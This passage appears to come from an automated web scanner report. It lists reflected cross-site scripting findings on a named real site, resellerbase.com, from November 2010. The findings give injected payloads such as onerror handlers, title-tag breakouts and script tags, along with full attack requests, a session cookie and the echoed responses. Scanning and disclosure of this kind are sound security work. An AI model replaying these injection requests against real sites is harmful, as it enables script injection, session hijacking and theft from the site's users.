The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2ae5b<img%20src%3da%20onerror%3dalert(1)>0641ad88061 was submitted in the REST URL parameter 5. This input was echoed as 2ae5b<img src=a onerror=alert(1)>0641ad88061 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating2ae5b<img%20src%3da%20onerror%3dalert(1)>0641ad88061/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/rating2ae5b<img src=a onerror=alert(1)>0641ad88061/search.php]</td>
...[SNIP]...

2.4533. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as text between TITLE tags. The payload 7aaed</title><img%20src%3da%20onerror%3dalert(1)>38e2a44d05b was submitted in the REST URL parameter 5. This input was echoed as 7aaed</title><img src=a onerror=alert(1)>38e2a44d05b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating7aaed</title><img%20src%3da%20onerror%3dalert(1)>38e2a44d05b/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/rating7aaed</title><img src=a onerror=alert(1)>38e2a44d05b/search.php</title>
...[SNIP]...

2.4534. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 57aeb<img%20src%3da%20onerror%3dalert(1)>18aa90bc97f6605b2 was submitted in the REST URL parameter 5. This input was echoed as 57aeb<img src=a onerror=alert(1)>18aa90bc97f6605b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos/images/rating57aeb<img%20src%3da%20onerror%3dalert(1)>18aa90bc97f6605b2/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:04:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/rating57aeb<img src=a onerror=alert(1)>18aa90bc97f6605b2/search.php]</td>
...[SNIP]...

2.4535. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as text between TITLE tags. The payload cdc59</title><img%20src%3da%20onerror%3dalert(1)>74c11e852798f9597 was submitted in the REST URL parameter 5. This input was echoed as cdc59</title><img src=a onerror=alert(1)>74c11e852798f9597 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos/images/ratingcdc59</title><img%20src%3da%20onerror%3dalert(1)>74c11e852798f9597/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:04:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/ratingcdc59</title><img src=a onerror=alert(1)>74c11e852798f9597/search.php</title>
...[SNIP]...

2.4536. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8856c<img%20src%3da%20onerror%3dalert(1)>5ef148c5f47 was submitted in the REST URL parameter 6. This input was echoed as 8856c<img src=a onerror=alert(1)>5ef148c5f47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating/search.php8856c<img%20src%3da%20onerror%3dalert(1)>5ef148c5f47?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/rating/search.php8856c<img src=a onerror=alert(1)>5ef148c5f47]</td>
...[SNIP]...

2.4537. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload c3569<img%20src%3da%20onerror%3dalert(1)>ad4eca3e1adb7c49c was submitted in the REST URL parameter 6. This input was echoed as c3569<img src=a onerror=alert(1)>ad4eca3e1adb7c49c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos/images/rating/search.phpc3569<img%20src%3da%20onerror%3dalert(1)>ad4eca3e1adb7c49c?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:05:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/rating/search.phpc3569<img src=a onerror=alert(1)>ad4eca3e1adb7c49c]</td>
...[SNIP]...

2.4538. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as text between TITLE tags. The payload 8aae9</title><img%20src%3da%20onerror%3dalert(1)>4c2abf8a221258f76 was submitted in the REST URL parameter 6. This input was echoed as 8aae9</title><img src=a onerror=alert(1)>4c2abf8a221258f76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos/images/rating/search.php8aae9</title><img%20src%3da%20onerror%3dalert(1)>4c2abf8a221258f76?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:05:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/rating/search.php8aae9</title><img src=a onerror=alert(1)>4c2abf8a221258f76</title>
...[SNIP]...

2.4539. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as text between TITLE tags. The payload e1288</title><img%20src%3da%20onerror%3dalert(1)>b3de2c83feb was submitted in the REST URL parameter 6. This input was echoed as e1288</title><img src=a onerror=alert(1)>b3de2c83feb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating/search.phpe1288</title><img%20src%3da%20onerror%3dalert(1)>b3de2c83feb?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/rating/search.phpe1288</title><img src=a onerror=alert(1)>b3de2c83feb</title>
...[SNIP]...

2.4540. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a792c<img%20src%3da%20onerror%3dalert(1)>48e607ebde6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a792c<img src=a onerror=alert(1)>48e607ebde6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating/search.php/a792c<img%20src%3da%20onerror%3dalert(1)>48e607ebde6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9856

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/rating/search.php/a792c<img src=a onerror=alert(1)>48e607ebde6]</td>
...[SNIP]...

2.4541. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload 10b39</title><img%20src%3da%20onerror%3dalert(1)>85d6948052b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 10b39</title><img src=a onerror=alert(1)>85d6948052b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating/search.php/10b39</title><img%20src%3da%20onerror%3dalert(1)>85d6948052b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9872

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/rating/search.php/10b39</title><img src=a onerror=alert(1)>85d6948052b</title>
...[SNIP]...

2.4542. http://www.resellerbase.com/tag/themes/kosmos/images/review/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 48162<script>alert(1)</script>400e891128 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag48162<script>alert(1)</script>400e891128/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:00:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag48162<script>alert(1)</script>400e891128/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.4543. http://www.resellerbase.com/tag/themes/kosmos/images/review/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 43291<a>0f1b45dc283 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tag/themes43291<a>0f1b45dc283/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:00:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themes43291<a>0f1b45dc283/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.4544. http://www.resellerbase.com/tag/themes/kosmos/images/review/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 20099<a>604cccae90e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tag/themes/kosmos20099<a>604cccae90e/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:01:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themes/kosmos20099<a>604cccae90e/images/review/ was not found on this server.</p>
...[SNIP]...

2.4545. http://www.resellerbase.com/tag/themes/kosmos/images/review/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 95280<a>452538f0f02 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tag/themes/kosmos/images95280<a>452538f0f02/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:01:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themes/kosmos/images95280<a>452538f0f02/review/ was not found on this server.</p>
...[SNIP]...

2.4546. http://www.resellerbase.com/tag/themes/kosmos/images/review/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2c715<a>8e6440da0b2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tag/themes/kosmos/images/review2c715<a>8e6440da0b2/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:01:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themes/kosmos/images/review2c715<a>8e6440da0b2/ was not found on this server.</p>
...[SNIP]...

2.4547. http://www.resellerbase.com/tag/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 53c6b<script>alert(1)</script>19ebb070a49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/themes/kosmos/images/review/?53c6b<script>alert(1)</script>19ebb070a49=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themes/kosmos/images/review/?53c6b<script>alert(1)</script>19ebb070a49=1 was not found on this server.</p>
...[SNIP]...

2.4548. http://www.resellerbase.com/tag/themes/kosmos/images/review/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b7c3a<script>alert(1)</script>8940e5a87c9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagb7c3a<script>alert(1)</script>8940e5a87c9/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:52:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagb7c3a<script>alert(1)</script>8940e5a87c9/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

